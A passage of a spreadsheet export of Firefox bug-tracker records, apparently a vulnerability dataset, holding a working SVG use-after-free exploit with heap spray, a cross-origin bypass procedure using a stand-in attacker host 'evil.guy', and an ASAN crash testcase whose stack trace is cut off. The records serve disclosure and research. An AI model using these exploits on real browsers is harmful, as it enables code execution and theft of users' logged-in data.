memory accessed from these out-of-bounds indexes can be controlled by
the attacker, and thus result in remote arbitrary code execution.
The code below demonstrates registration of an observer which removes
elements and triggers the vulnerability:
---------------
Begin Code Snip
---------------
&lt;html&gt;
&lt;head&gt;
&lt;script&gt;
var container = [];
var tls = [];
var rect = null;
var big = null;
var small = null;
function listener() {
  rect.removeEventListener("DOMAttrModified", listener, false);
  for each (tl in tls)
    tl.clear();
  // gc &amp; heap spray
  for (i = 0; i &lt; (1&lt;&lt;7); ++i)
    container.push(unescape(big));
  for (i = 0; i &lt; (1&lt;&lt;22); ++i)
    container.push(unescape(small));
}
function run() {
  var svg = document.getElementById("svg");
  rect = document.getElementById("rect");
  for (i = 0; i &lt; (1&lt;&lt;13); ++i) {
    rect = rect.cloneNode(false);
    var atl = rect.transform;
    var tl = atl.baseVal;
    tls.push(tl);
  }
  const addr = unescape("%uc0c0");
  big = addr;
  while (big.length != 0x100000)
    big += big;
  small = addr;
  while (small.length != 15)
    small += addr;
  var trans = svg.createSVGTransform();
  for each (tl in tls)
    tl.appendItem(trans);
  rect.addEventListener("DOMAttrModified", listener, false);
  var matrix = svg.createSVGMatrix();
  trans.setMatrix(matrix);
  alert("PoC failed");
}
&lt;/script&gt;
&lt;/head&gt;
&lt;body onload="run();"&gt;
  &lt;svg id="svg"&gt;
    &lt;rect
      id="rect"
      x="0"
      y="0"
      width="10"
      height="10"
      fill="red"
      stroke="black"/&gt;
  &lt;/svg&gt;
&lt;/body&gt;
&lt;/html&gt;
----------------
End of Code Snip
----------------
This code will register an observer which removes elements and
populates memory with the value c0c0c0c0. This memory is used to look
up a function pointer which is then called.
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
   regenrecht</t>
        </is>
      </c>
      <c r="X2219" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2220">
      <c r="A2220" t="n">
        <v>1026774</v>
      </c>
      <c r="B2220" t="inlineStr">
        <is>
          <t>2014-06-17 15:21:03 -0700</t>
        </is>
      </c>
      <c r="C2220" t="inlineStr">
        <is>
          <t>malloc of undefined size in stun_get_mib_addrs in rare cases</t>
        </is>
      </c>
      <c r="D2220" t="inlineStr">
        <is>
          <t>2016-06-04 16:01:34 -0700</t>
        </is>
      </c>
      <c r="E2220" t="n">
        <v>1</v>
      </c>
      <c r="F2220" t="n">
        <v>1</v>
      </c>
      <c r="G2220" t="n">
        <v>3</v>
      </c>
      <c r="H2220" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2220" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2220" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K2220" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2220" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2220" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2220" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2220" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2220" t="inlineStr">
        <is>
          <t>[adv-main35+][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q2220" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2220" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2220" t="inlineStr">
        <is>
          <t>mozilla35</t>
        </is>
      </c>
      <c r="T2220" t="n">
        <v>1</v>
      </c>
      <c r="U2220" t="n">
        <v>0</v>
      </c>
      <c r="V2220" t="n">
        <v>15</v>
      </c>
      <c r="W2220" t="inlineStr">
        <is>
          <t>If this call fails, |needed| is left uninitialized, and then passed to malloc (errx only prints to stderr, it does not bail).
http://dxr.mozilla.org/mozilla-central/source/media/mtransport/third_party/nICEr/src/stun/addrs.c#242
Granted, this failure should be rare, but I am not totally sure how rare.</t>
        </is>
      </c>
      <c r="X2220" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2221">
      <c r="A2221" t="n">
        <v>3819</v>
      </c>
      <c r="B2221" t="inlineStr">
        <is>
          <t>1999-03-16 10:56:32 -0800</t>
        </is>
      </c>
      <c r="C2221" t="inlineStr">
        <is>
          <t>Window GFX Unicode Text Drawing- Non ASCII font face in prefs.js does not convert correctly</t>
        </is>
      </c>
      <c r="D2221" t="inlineStr">
        <is>
          <t>2005-03-17 13:34:04 -0800</t>
        </is>
      </c>
      <c r="E2221" t="n">
        <v>1</v>
      </c>
      <c r="F2221" t="n">
        <v>1</v>
      </c>
      <c r="G2221" t="n">
        <v>3</v>
      </c>
      <c r="H2221" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2221" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2221" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K2221" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2221" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2221" t="inlineStr">
        <is>
          <t>Windows 95</t>
        </is>
      </c>
      <c r="N2221" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2221" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2221" t="inlineStr">
        <is>
          <t>[PDT+]</t>
        </is>
      </c>
      <c r="Q2221" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2221" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2221" t="inlineStr">
        <is>
          <t>M14</t>
        </is>
      </c>
      <c r="T2221" t="n">
        <v>1</v>
      </c>
      <c r="U2221" t="n">
        <v>0</v>
      </c>
      <c r="V2221" t="n">
        <v>16</v>
      </c>
      <c r="W2221" t="inlineStr">
        <is>
          <t>Tested 3-15-99 and 3-16-99 Win32 under Windows 95J and Winnt 4.0J.
After I copied the pref.js file which I got from Frank to the same directory the Viewer.exe,
the Japanese page such as http://home.jp.netscape.com does not display Japanese correctly.</t>
        </is>
      </c>
      <c r="X2221" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2222">
      <c r="A2222" t="n">
        <v>1208339</v>
      </c>
      <c r="B2222" t="inlineStr">
        <is>
          <t>2015-09-24 20:58:50 -0700</t>
        </is>
      </c>
      <c r="C2222" t="inlineStr">
        <is>
          <t>Cross-Origin restriction bypass with fetch using 302 redirection</t>
        </is>
      </c>
      <c r="D2222" t="inlineStr">
        <is>
          <t>2024-05-30 09:05:46 -0700</t>
        </is>
      </c>
      <c r="E2222" t="n">
        <v>1</v>
      </c>
      <c r="F2222" t="n">
        <v>1</v>
      </c>
      <c r="G2222" t="n">
        <v>3</v>
      </c>
      <c r="H2222" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2222" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2222" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2222" t="inlineStr">
        <is>
          <t>41 Branch</t>
        </is>
      </c>
      <c r="L2222" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2222" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2222" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2222" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P2222" t="inlineStr">
        <is>
          <t>fixed on trunk as part of bug 1184607, rediscovered as 1212669</t>
        </is>
      </c>
      <c r="Q2222" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2222" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2222" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2222" t="n">
        <v>1</v>
      </c>
      <c r="U2222" t="n">
        <v>0</v>
      </c>
      <c r="V2222" t="n">
        <v>24</v>
      </c>
      <c r="W2222" t="inlineStr">
        <is>
          <t>Created attachment 8665773
PoC-FF.html
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Build ID: 20150921151815
Steps to reproduce:
1. Create a 302 redirect on owned server (http://evil.guy/redir) which contains a 'Location:' header pointing to the victims website  (ex: Location: https://twitter.com/)
2. Create page (http://evil.guy/PoC.html) that contains the exploit code as well as two iframes, one empty and one pointing to '//twitter.com/' directly. (please see attached PoC-FF.html)
3. Modify 'PoC-FF.html' replacing 'http://localhost/redir.php' with your own 302 redirector.
4. Visit 'http://evil.guy/PoC-FF.html' 
Actual results:
- The iframe with href='//twitter.com/' is immediately blocked (as expected)
- The second iframe, however, contains the full contents of twitter.com
If the victim was logged into twitter then the iframe will display him as logged in, successfully bypassing firefox's Cross-Origin security, as you can probably imagine, this is extremely unsafe for FireFox users.
Expected results:
Both iframes should have been blocked. 
More precisely, the Fetch() function should not blindly follow 302 redirects but rather detect if a 302 is present then recheck origins.</t>
        </is>
      </c>
      <c r="X2222" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2223">
      <c r="A2223" t="n">
        <v>1350683</v>
      </c>
      <c r="B2223" t="inlineStr">
        <is>
          <t>2017-03-26 04:14:29 -0700</t>
        </is>
      </c>
      <c r="C2223" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsTransactionManager::EndTransaction</t>
        </is>
      </c>
      <c r="D2223" t="inlineStr">
        <is>
          <t>2024-05-30 09:31:05 -0700</t>
        </is>
      </c>
      <c r="E2223" t="n">
        <v>1</v>
      </c>
      <c r="F2223" t="n">
        <v>1</v>
      </c>
      <c r="G2223" t="n">
        <v>3</v>
      </c>
      <c r="H2223" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2223" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2223" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K2223" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2223" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2223" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2223" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2223" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2223" t="inlineStr">
        <is>
          <t>[adv-main53+][adv-esr52.1+][adv-esr45.9+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2223" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2223" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2223" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T2223" t="n">
        <v>1</v>
      </c>
      <c r="U2223" t="n">
        <v>0</v>
      </c>
      <c r="V2223" t="n">
        <v>14</v>
      </c>
      <c r="W2223" t="inlineStr">
        <is>
          <t>The following testcase crashes the latest ASAN build of Firefox (BuildID=20170326014008)
&lt;script&gt;
function start() {
        o1=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
        o1.addEventListener('load', fun0,false);
        document.body.appendChild(o1);
        o2=window.document;
}
function fun0() {
        o4=o1.contentWindow;
        o5=o1.contentDocument;
        o16=o5.getElementsByTagName('*')[1];
        o81=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
        o81.src='data:text/html,&lt;div&gt;';
        o16.appendChild(o81);
        o90=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
        o90.src='data:text/html,&lt;div&gt;';
        o90.addEventListener('load', fun2,false);
        o81.appendChild(o90);
        o1.contentWindow.onresize=fun1;
        o1.height='32px';
        o4.stop();
}
function fun1() {
        o2.designMode='on';
        o2.execCommand('heading',false,'h1');
}
function fun2() {
        o2.designMode='off';
        o4.fuzzPriv.CC();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==12221==ERROR: AddressSanitizer: heap-use-after-free on address 0x614000142c60 at pc 0x7f2787ba2430 bp 0x7ffd783787c0 sp 0x7ffd783787b8
READ of size 8 at 0x614000142c60 thread T0 (Web Content)
    #0 0x7f2787ba242f in nsDeque::Pop() /home/worker/workspace/build/src/xpcom/ds/nsDeque.cpp:260:7
    #1 0x7f278de14946 in Pop /home/worker/workspace/build/src/editor/txmgr/nsTransactionStack.cpp:57:58
    #2 0x7f278de14946 in nsTransactionManager::EndTransaction(bool) /home/worker/workspace/build/src/editor/txmgr/nsTransactionManager.cpp:672
    #3 0x7f278de13e29 in nsTransactionManager::DoTransaction(nsITransaction*) /home/worker/workspace/build/src/editor/txmgr/nsTransactionManager.cpp:80:8
    #4 0x7f278dc3fdd4 in mozilla::EditorBase::DoTransaction(nsITransaction*) /home/worker/workspace/build/src/editor/libeditor/EditorBase.cpp:737:21
    #5 0x7f278dc6f604 in mozilla::EditorBase::DeleteNode(nsINode*) /home/worker/workspace/build/src/editor/libeditor/EditorBase.cpp:1588:41
    #6 0x7f278dc714dc in mozilla::EditorBase::MoveNode(nsIContent*, nsINode*, int) /home/worker/workspace/build/src/editor/libeditor/EditorBase.cpp:1785:17
    #7 0x7f278dd1a78a in mozilla::HTMLEditRules::ApplyBlockStyle(nsTArray&lt;mozilla::OwningNonNull&lt;nsINode&gt; &gt;&amp;, nsIAtom&amp;) /home/worker/workspace/build/src/editor/libeditor/HTMLEditRules.cpp:6954:33
    #8 0x7f278dce69e3 in mozilla::HTMLEditRules::WillMakeBasicBlock(mozilla::dom::Selection&amp;, nsAString const&amp;, bool*, bool*) /home/worker/workspace/build/src/editor/libeditor/HTMLEditRules.cpp:3593:10
    #9 0x7f278dcce370 in mozilla::HTMLEditRules::WillDoAction(mozilla::dom::Selection*, mozilla::RulesInfo*, bool*, bool*) /home/worker/workspace/build/src/editor/libeditor/HTMLEditRules.cpp:649:14
    #10 0x7f278dd5285f in mozilla::HTMLEditor::InsertBasicBlock(nsAString const&amp;) /home/worker/workspace/build/src/editor/libeditor/HTMLEditor.cpp:2131:24
    #11 0x7f278dd51d36 in mozilla::HTMLEditor::SetParagraphFormat(nsAString const&amp;) /home/worker/workspace/build/src/editor/libeditor/HTMLEditor.cpp:1731:10
    #12 0x7f278de22212 in nsParagraphStateCommand::SetState(nsIEditor*, nsString&amp;) /home/worker/workspace/build/src/editor/composer/nsComposerCommands.cpp:648:22
    #13 0x7f278de21671 in nsMultiStateCommand::DoCommandParams(char const*, nsICommandParams*, nsISupports*) /home/worker/workspace/build/src/editor/composer/nsComposerCommands.cpp:595:12
    #14 0x7f278c0b7f23 in nsControllerCommandTable::DoCommandParams(char const*, nsICommandParams*, nsISupports*) /home/worker/workspace/build/src/dom/commandhandler/nsControllerCommandTable.cpp:162:26
    #15 0x7f278c0aeef3 in DoCommandWithParams /home/worker/workspace/build/src/dom/commandhandler/nsBaseCommandController.cpp:152:25
    #16 0x7f278c0aeef3 in non-virtual thunk to nsBaseCommandController::DoCommandWithParams(char const*, nsICommandParams*) /home/worker/workspace/build/src/dom/commandhandler/nsBaseCommandController.cpp:140
    #17 0x7f278c0b50bb in nsCommandManager::DoCommand(char const*, nsICommandParams*, mozIDOMWindowProxy*) /home/worker/workspace/build/src/dom/commandhandler/nsCommandManager.cpp:212:29
    #18 0x7f278c5fa045 in nsHTMLDocument::ExecCommand(nsAString const&amp;, bool, nsAString const&amp;, nsIPrincipal&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:3336:18
    #19 0x7f278bb531ac in mozilla::dom::HTMLDocumentBinding::execCommand(JSContext*, JS::Handle&lt;JSObject*&gt;, nsHTMLDocument*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:835:21
    #20 0x7f278bdf313e in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2953:13
    #21 0x7f27915c3e53 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #22 0x7f27915c3e53 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:454
    #23 0x7f27915ac698 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
    #24 0x7f27915ac698 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2998
    #25 0x7f27915925fe in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #26 0x7f27915c3fd8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
    #27 0x7f27915c4802 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #28 0x7f27921ce96e in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #29 0x7f2792185164 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #30 0x7f27921aee83 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:21
    #31 0x7f27921b17e7 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #32 0x7f27915c41a3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #33 0x7f27915c41a3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
    #34 0x7f27915c4802 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #35 0x7f2791f4142b in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
    #36 0x7f278b895c95 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #37 0x7f278c1f8c9b in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #38 0x7f278c1f8c9b in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #39 0x7f278c1c5022 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1123:51
    #40 0x7f278c1c6f0f in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1296:20
    #41 0x7f278c1b2771 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:466:16
    #42 0x7f278c1b5af8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:827:9
    #43 0x7f278e227300 in mozilla::PresShell::FireResizeEvent() /home/worker/workspace/build/src/layout/base/PresShell.cpp:2052:5
    #44 0x7f278e23c850 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4139:7
    #45 0x7f278a536c21 in FlushPendingNotifications /home/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:599:5
    #46 0x7f278a536c21 in nsDocument::FlushPendingNotifications(mozilla::FlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8023
    #47 0x7f278a536b18 in nsDocument::FlushPendingNotifications(mozilla::FlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8019:22
    #48 0x7f2789529f0b in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:685:14
    #49 0x7f278952c1e2 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:614:5
    #50 0x7f278952cf0c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:470:14
    #51 0x7f2787e3f9f2 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:635:28
    #52 0x7f2787e3bea3 in mozilla::net::nsLoadGroup::Cancel(nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:271:15
    #53 0x7f278952999f in nsDocLoader::Stop() /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:245:22
    #54 0x7f278952981c in nsDocLoader::Stop() /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:242:3
    #55 0x7f27906440c9 in Stop /home/worker/workspace/build/src/docshell/base/nsDocShell.h:190:25
    #56 0x7f27906440c9 in nsDocShell::Stop(unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5566
    #57 0x7f279069f9af in non-virtual thunk to nsDocShell::Stop(unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5530:13
    #58 0x7f278a22700b in nsGlobalWindow::StopOuter(mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:7906:22
    #59 0x7f278b604f2c in mozilla::dom::WindowBinding::stop(JSContext*, JS::Handle&lt;JSObject*&gt;, nsGlobalWindow*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:1965:9
    #60 0x7f278b604080 in mozilla::dom::WindowBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:15658:13
    #61 0x7f27915c3e53 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #62 0x7f27915c3e53 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:454
    #63 0x7f27915c4802 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #64 0x7f27921ce96e in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #65 0x7f2792185164 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #66 0x7f27921aee83 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:21
    #67 0x7f27921b17e7 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #68 0x7f27915c41a3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #69 0x7f27915c41a3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
    #70 0x7f27915ac698 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
    #71 0x7f27915ac698 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2998
    #72 0x7f27915925fe in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #73 0x7f27915c3fd8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
    #74 0x7f27915c4802 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #75 0x7f2791f4142b in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
    #76 0x7f278b898b97 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
    #77 0x7f278c1c4fe8 in HandleEvent&lt;mozilla::dom::EventTarget *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
    #78 0x7f278c1c4fe8 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1120
    #79 0x7f278c1c6f0f in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1296:20
    #80 0x7f278c1b2771 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:466:16
    #81 0x7f278c1b5af8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:827:9
    #82 0x7f278a1f32e7 in nsGlobalWindow::PostHandleEvent(mozilla::EventChainPostVisitor&amp;) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:3919:7
    #83 0x7f278c1b2867 in PostHandleEvent /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:417:12
    #84 0x7f278c1b2867 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:469
    #85 0x7f278c1b2dec in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:519:5
    #86 0x7f278c1b5af8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:827:9
    #87 0x7f278e31182c in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1043:7
    #88 0x7f27906b6f49 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7671:21
